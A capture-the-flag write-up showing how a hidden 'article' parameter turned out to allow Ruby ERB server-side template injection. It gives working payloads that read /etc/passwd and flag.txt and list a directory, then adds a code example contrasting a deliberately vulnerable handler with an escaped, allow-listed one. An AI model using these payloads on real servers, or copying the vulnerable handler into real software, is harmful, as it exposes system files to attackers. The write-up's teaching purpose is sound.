I tried many different vulnerable tasks in this challenge, but they did not work. I noticed there is a hidden value, article[a]. I tried the input aaaaaaaaaaaaa and it did not work, but when I inserted the number 111111 it worked.
So I tried arithmetic calculations.
2 + 4 # does not work
2 * 4 # works
5 / 2 # works
After searching Google, it turns out to be Server Side Template Injection, but there are many languages there: Ruby, Python, PHP, Java.
It is a useful link.
I found this link and read it.
To read /etc/passwd
<%= File.open('/etc/passwd').read %>
Yeah! It works.
OK. Time to read flag.txt.
<%= File.open('flag.txt').read %>
The flag is
Note: There is a nice trick to search a directory. Credit to Aj Dumanhug.
<%= Dir.entries('.') %>
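Why the ERB tags above were executed, and how the server side should handle the parameter instead, shown as an added example that is not part of the original write-up or the challenge's code. The handler names, the HTML wrapper and the numeric allow-list are assumptions; the probe is a constructed, harmless arithmetic expression like the one used earlier.

```ruby
require 'erb'

# Hypothetical vulnerable handler (assumption, not the challenge's source):
# the request value is concatenated into the template SOURCE, so any ERB
# tags it contains are compiled and executed on the server.
def render_vulnerable(article)
  ERB.new("<p>Article: #{article}</p>").result(binding)
end

# Hardened form: the template is a fixed constant and the request value is
# only ever passed in as data, then HTML-escaped on output.
SAFE_TEMPLATE = ERB.new('<p>Article: <%= ERB::Util.html_escape(article) %></p>')

def render_safe(article)
  SAFE_TEMPLATE.result_with_hash(article: article.to_s)
end

# Defence in depth: the field accepted 111111, so assume it is a numeric id
# and reject everything else. \A and \z anchor the whole string; ^ and $
# would only anchor a single line in Ruby.
def valid_article_id?(value)
  value.to_s.match?(/\A\d{1,10}\z/)
end

# Constructed, harmless probe: arithmetic inside an ERB output tag.
PROBE = '<%= 2 * 4 %>'

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(PROBE)    # expression is evaluated by the server
  puts render_safe(PROBE)          # expression is shown as literal text
  puts valid_article_id?('111111') # numeric id is accepted
  puts valid_article_id?(PROBE)    # template syntax is rejected
end
```

If the vulnerable handler returns the evaluated result of the probe, anything a Ruby expression can do is reachable through that parameter, which is what the file reads above rely on.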
Thanks for reading.